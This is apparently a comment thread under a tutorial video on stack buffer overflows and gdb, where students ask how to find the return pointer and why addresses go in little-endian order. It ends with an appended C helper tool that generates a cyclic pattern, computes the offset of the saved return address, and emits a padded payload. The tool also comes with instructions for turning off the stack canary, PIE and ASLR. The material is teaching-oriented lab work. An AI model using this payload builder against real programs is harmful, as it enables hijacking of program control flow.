Seems you've stopped posting vids... but this is by far the best intro to BO and gdb out there. I salute you good sir, and please come back!
True
I agree. This was so much fun watching a BO practical example. I quite enjoyed it. 🤟✌️👏👏👏
This guy is freaking awesome. He explains it so much better than my professor :D.
Best video explanation of this seemingly complicated topic, thank you!
Hi James, very nice video. I am interested in system programming, and it is so difficult to find a tutorial video like this. Please don't stop.
This is literally some of the best and most practical explanation, conveyed so nicely, of low-level stuff (pun intended :D), great respect
sooo helpful - would have been up all night doing my pset if it weren't for this video
Extremely well explained! 😊
The only thing that is NOT CLEAR from this video is how you guessed the return address? How did you know exactly which address should be replaced by B ascii values?
“x/1x $sp” should work
I am delighted, I acquired so much understandable information, TY man!
beautiful!!! just what I was after!
How did you find the return pointer just by looking at the stack?
experience i think
Trial and error, you gotta enter dummy values like A until you hit a segmentation fault
Love this gdb stuff very little missing I assume after access granted on a real system the operating system or private code would still run or would you have to point to it
Thank you so much for the clear explanation. Please, where can I find a full course of yours?
Thanks for this wonderful analysis video....
I understood properly, thank you sir for the video
Could you explain how do we identify the return address?
anoop john by radarex
This video is really high quality content!
This video was so helpful, I watched it twice :)
Amazing explanation. Thanks a lot
James- great video
Thank you for your awesome how-to!
such a nice video
8:50 I'm really confused on how he can tell it's the return pointer
Exactly my point. how do u determine the return pointer
@tlehloba Usually, trial and error
You can find it out by checking the push/pop instructions, which push items onto the stack frame or pop from it, in the disassembled function. The return pointer of a function is pushed on the stack when it's called.
@kraken_norse thank you man, you saved the day
I do the same exact steps but I only get a seg fault. Can it be because the memory region of my eip (return pointer) is only readable?
much appreciation mate
If I want to put shellcode in, the return address is the bottom of the stack, isn't it?
Great video sir!
Thank youuuuu. I have a little problem: say I can write into the buffer through argv[1]. Once I figure out how many characters I need and I figure out what the return pointer address is, if I execute ./program with my payload + p32(address I need in hex), when I check in gdb the return address changed, but not to the address I need it to be, as if it read the "\" and the "x" of the little-endian p32 as values on their own. How can I change that?
Why does the stack store new data towards the return pointer? Wouldn't going the opposite way ensure rp is never touched?
Well explained. I got the flag I was looking for.
awesome video explained so much
More videos plzz ..
Is it possible to exploit packet buffer overflow due to slow data rate
I'm finally getting it!!! 🎉
You're a legend sir, you're the best... You rock..
When you print the stack with x/##x $esp, the first address that you call the offset, is that just the first address of the following 4 * 4 bytes?
Another good one, keep it up, you have a good way of presenting
Superb
How do I ignore the gcc errors because of the implicit declaration of the "gets" function?
How to identify the return pointer?
First you do break main, then when you run and it hits the first breakpoint at main you can do info frame and it will give you the rbp/ebp (depending on whether you run on a 64- or 32-bit architecture). It will also give you the eip/rip; this is the location of the return pointer.
This is awesome
Very well explained
Thank you sooo much
good stuff
Everything was great, but I just couldn't get access granted
awesome
You do know you used the same superman line in both buffer videos, right? Haha, just teasing. Thank you for answering questions that nobody else could.
What if we do not have an $esp register after the gets function? Instead I have an $rax register.
It's a 64-bit application, you will find $rsp instead of $esp
Which software is this?
The code is not compiling
Anybody else getting a cannot access memory address error after setting breakpoints?
❤
Thank U so much
Why does the address of the granted function needs to be written down in little endian?
because the value we are storing at a particular memory address must be stored in hex. Little endian specifies that it is already in hex otherwise we would not be able to differentiate between python string or python reference to hex value
Who has done the lab? Send it to me in DMs please)
This does not work! Maybe it did on whatever system you used? But it doesn't work on Ubuntu 20.04, cannot overwrite the return of gets, no matter what I try!
teach me more about hacking an android device
Not really
+Abay Zhunus The main thing is that the deadline got extended)
ai dento
Meanwhile, 47 minutes left until the deadline
Instead of 0x41414141 I get 0x565561f5 which is my ret address.
I got the address working when I used the example code from kuafu1994.github.io/HackWithGDB/ASM.html
What, is that lab 8? hahahaha
Which one? )
In the future that's already lab 7)😂
Has anyone really been far even as decided to use even go want to do look more like?
Oatify Er... take a deep breath and then try again...
you don't use nano? I can't watch this.
Can I have your LinkedIn account? I've a challenge for you
How to identify the return pointer?
First you do break main, then when you run and it hits the first breakpoint at main you can do info frame and it will give you the rbp/ebp (depending on whether you run on a 64- or 32-bit architecture). It will also give you the eip/rip; this is the location of the return pointer.
@breakingcode92 How do you determine eip/rip?
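The recurring questions in these threads (how the return pointer was found on the stack, why the address of the granted function is written in little-endian order, and why a "\x.." typed on the command line did not end up as a single byte) have one practical answer: generate a cyclic pattern, read the garbage that lands in eip after the crash, compute the offset from it, and then emit padding plus the little-endian address as raw bytes. The following is an added example in C, not code from the video or from the channel: a small helper tool that does those three steps. The address 0x080491b6, the offset 76 and the program name ./vulnerable used in its comments are placeholders, not values from the video.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0...Zz9 (20280 bytes before
   it repeats). Every 4-byte window in it is unique, so whatever lands in eip
   after the crash identifies its own position. Writes up to `len` bytes plus
   a terminating NUL into `out` (caller provides len + 1 bytes). */
size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (char upper = 'A'; upper <= 'Z' && n < len; upper++)
        for (char lower = 'a'; lower <= 'z' && n < len; lower++)
            for (char digit = '0'; digit <= '9' && n < len; digit++) {
                const char triple[3] = { upper, lower, digit };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = triple[i];
            }
    out[n] = '\0';
    return n;
}

/* p32(): store a 32-bit value little-endian, lowest byte first. This is why a
   target of 0x080491b6 is written as \xb6\x91\x04\x08: an x86 CPU reads the
   saved return address from memory lowest byte first. */
void p32(uint32_t value, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Given the value gdb shows in eip after the crash (e.g. 0x61413161), find
   where those four bytes sit in the pattern. That index is the number of
   padding bytes between the start of the buffer and the saved return
   address. Returns -1 if the value did not come from the pattern. */
long pattern_offset(uint32_t eip_value, size_t pattern_len) {
    unsigned char needle[4];
    p32(eip_value, needle);
    char *pattern = malloc(pattern_len + 1);
    if (!pattern) return -1;
    size_t n = pattern_create(pattern, pattern_len);
    long found = -1;
    for (size_t i = 0; i + 4 <= n; i++) {
        if (memcmp(pattern + i, needle, 4) == 0) { found = (long)i; break; }
    }
    free(pattern);
    return found;
}

/* Payload = `offset` bytes of padding followed by the target address in
   little-endian order. Returns the payload length, 0 if it does not fit. */
size_t build_payload(size_t offset, uint32_t target, unsigned char *out, size_t cap) {
    if (cap < offset + 4) return 0;
    memset(out, 'A', offset);
    p32(target, out + offset);
    return offset + 4;
}

/* Usage (placeholder offset/address/target name):
 *   ./bof pattern 200                  -> prints a 200-byte pattern
 *   ./bof offset 0x61413161            -> prints 4
 *   ./bof payload 76 0x080491b6 | ./vulnerable
 */
int main(int argc, char **argv) {
    if (argc >= 3 && strcmp(argv[1], "pattern") == 0) {
        size_t len = strtoul(argv[2], NULL, 10);
        char *buf = malloc(len + 1);
        if (!buf) return 1;
        fwrite(buf, 1, pattern_create(buf, len), stdout);
        free(buf);
        return 0;
    }
    if (argc >= 3 && strcmp(argv[1], "offset") == 0) {
        printf("%ld\n", pattern_offset((uint32_t)strtoul(argv[2], NULL, 16), 20280));
        return 0;
    }
    if (argc >= 4 && strcmp(argv[1], "payload") == 0) {
        unsigned char buf[4096];
        size_t n = build_payload(strtoul(argv[2], NULL, 10),
                                 (uint32_t)strtoul(argv[3], NULL, 16), buf, sizeof buf);
        if (!n) return 1;
        fwrite(buf, 1, n, stdout);
        return 0;
    }
    fprintf(stderr, "usage: %s pattern <len> | offset <eip hex> | payload <offset> <addr hex>\n", argv[0]);
    return 1;
}
```

Feed the output of `./bof pattern 200` to the target under gdb, read eip from the crash (`info registers eip`), pass that value to `./bof offset`, then pipe `./bof payload <offset> <address of the granted function>` into the target. Because the bytes are produced by a program rather than typed, the shell never sees a backslash; typing `\xb6` on the command line passes the four characters `\`, `x`, `b`, `6`, which is exactly the symptom described in the argv[1] question above. If the target reads argv[1] instead of stdin, use `./vulnerable "$(./bof payload 76 0x080491b6)"`, keeping in mind that a NUL byte inside the address will truncate an argv string. On a current distribution the textbook layout only appears when the target is built with `gcc -m32 -fno-stack-protector -no-pie` and ASLR is off for the run (`setarch $(uname -m) -R ./vulnerable`); the default stack canary and PIE are the usual reason the overwrite "does not work" out of the box on Ubuntu 20.04.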